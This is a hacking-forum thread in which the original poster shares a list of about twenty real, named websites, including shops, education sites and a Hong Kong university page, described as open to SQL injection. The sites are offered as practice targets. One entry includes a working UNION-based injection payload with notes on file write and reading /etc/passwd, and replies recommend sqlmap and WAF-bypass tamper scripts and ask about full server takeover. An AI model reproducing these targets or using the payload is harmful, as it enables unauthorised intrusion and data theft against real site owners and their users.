[Free] Sharing some SQLi vulnerable sites..

[b3hindYou]

Hey collogues!

Here is a list of websites vulnerable to SQL Injection attacks via $_GET parameters. Very simple to exploit. I am posting this mostly as a good source for newbies to practice on, or for anyone who might want to test out a tool or something related.

https://www.pharmatel.net/topic.php?id=5    MySQL    [--] Unknown    02/18/2023 03:56:19   
https://www.aceronline.net/product.php?cid=2    MySQL    [--] Unknown    02/18/2023 03:57:29   
http://ugceresources.in/view-lecture.php?cid=4    MySQL    [IN] India    02/18/2023 03:57:38   
https://www.technos.in/news-details.php?Id=8    MySQL    [IN] India    02/18/2023 03:58:27   
http://esjindex.org/search.php?id=    MySQL    [--] Unknown    02/18/2023 03:59:37   
http://www.altiusguns.com/product.php?product_id=2113    MySQL    [--] Unknown    02/18/2023 04:00:48   
http://www.ruhrhose.com/productlist.php?fid=2    MySQL    [--] Unknown    02/18/2023 04:00:59   
http://www.webloadmpstore.com/product.php?id=    MySQL    [--] Unknown    02/18/2023 04:01:03   
https://www.eltbase.com/get_quiz.php?id=2    MySQL    [--] Unknown    02/18/2023 04:01:36   
http://www.pumps-hv.com/news.php?id=218    MySQL    [--] Unknown    02/18/2023 04:02:39   
http://fujirock-eng.com/frf14/news.php?id=7    MySQL    [--] Unknown    02/18/2023 04:03:33   
http://www.abbaruna.com/news.php?id=    MySQL    [--] Unknown    02/18/2023 04:04:34   
http://www.ruhrhose.com/productshow.php?fid=66&id=8    MySQL    [--] Unknown    02/18/2023 04:05:43   
http://onstylesports.com/products.php?id=9    MySQL    [--] Unknown    02/18/2023 04:08:14   
https://lexingtonlandscapesupply.com/product-list.php?category_id=    MySQL    [--] Unknown    02/18/2023 04:15:40   
http://www.pendragonpress.com/book.php?id=49    MySQL    [--] Unknown    02/18/2023 04:19:48   
http://ssy.org/main.php?id=    MySQL    [--] Unknown    02/18/2023 04:20:11   
https://worldwideeducation.co.in/view_detail.php?id=1    MySQL    [IN] India    02/18/2023 04:55:37   
http://a-plussoft.com/en/products.php?id=1    MySQL    [--] Unknown    02/18/2023 05:04:42   
https://hro.hkbu.edu.hk/content.php?page_id=204&menu_id=210    MySQL    [HK] Hong Kong    02/18/2023 08:11:28   
https://www.17tour.com.tw/newsCat.php?cat=999999.9 union all select 1,2,3,4,5,6,7,8,[t],10--    MySQL Union    5.7.41    File Write  638123879728250821 Read  /etc/passwd : user_privileges    [TW] Taiwan, Province of China        02/19/2023 07:19:35   
https://constanta.cz/index.php?cat=30'

 

[hackyouno]

очень полезно поделиться

 

[gh0stman3]

Спасибо брат, полезный пост!

 

[Prokhorenco]

For the noobs:

SQL injection (SQLi)​

• https://github.com/sqlmapproject/sqlmap
• Tamper agent scripts for sqlmap (WAF bypass): https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423
• https://github.com/r0oth3x49/ghauri

 

[glisenti]

Thank you for sharing !

 

[b3hindYou]

• https://github.com/r0oth3x49/ghauri

I am surprised I was unaware of this one, thank you for sharing that. I am testing it now as we speak. Visually it looks very similar to sqlmap tho.

 

[Pessw]

To find SQL injection not hard but how to exploit it !! that is the challenge, i have some famous website found SQL injection in

 

[cr33kcr4ck]

To find SQL injection not hard but how to exploit it !! that is the challenge, i have some famous website found SQL injection in

This is true! I am always realising how bad my math and logic is when I SQL inject, my brain even after years still does not used to boolean

 

[qGodless]

This is true! I am always realising how bad my math and logic is when I SQL inject, my brain even after years still does not used to boolean

just use sqlmap lol

 

[Prokhorenco]

just use sqlmap lol

Same, im too lazy otherwise.

 

[b3hindYou]

To find SQL injection not hard but how to exploit it !! that is the challenge, i have some famous website found SQL injection in

This is true! I am always realising how bad my math and logic is when I SQL inject, my brain even after years still does not used to boolean

These ones are very, very very easy to exploit. If you found this hard already, just keep on it, and do some technical reading on it.
- Earlier user @Prokhorenco listed everything you need to get this done. This is completely enough for beginners to exploit and access database.

For the noobs:

SQL injection (SQLi)​

• https://github.com/sqlmapproject/sqlmap
• Tamper agent scripts for sqlmap (WAF bypass): https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423
• https://github.com/r0oth3x49/ghauri

I could drop another set of similar links if anyone care? ^^

 

[crypt0]

just use sqlmap lol

chatGPT sqlmap plugin

 

[Pessw]

just use sqlmap lol

Same an issue not works most of the attempts even contain error sql

 

[crypt0]

then the logic isnt correct change it about

 

[Pessw]

then the logic isnt correct change it about

Examples ?

 

[xanterq]

Also, I would recommend to start with Portswigger Academy to understand manual approach of exploiting SQLi. Also, check other topics as this is the best FREE resource for newcomers.

 

[b3hindYou]

I am wondering what methods you personally prefer to go further by executing commands and injecting an actual payload to do a full takeover?

 

[b3hindYou]

As I am recently returned back and will be back working soon, I wanted to ask if I should post new vulnerable SQL links once I get more? Or this is just something no one really needs?

 

[qpq512]

As I am recently returned back and will be back working soon, I wanted to ask if I should post new vulnerable SQL links once I get more? Or this is just something no one really needs?

Need bro, I would really like to see something new, you are doing a good job

 

[moxie]

This is awesome for those who wants to practice for real.
Thanks dude..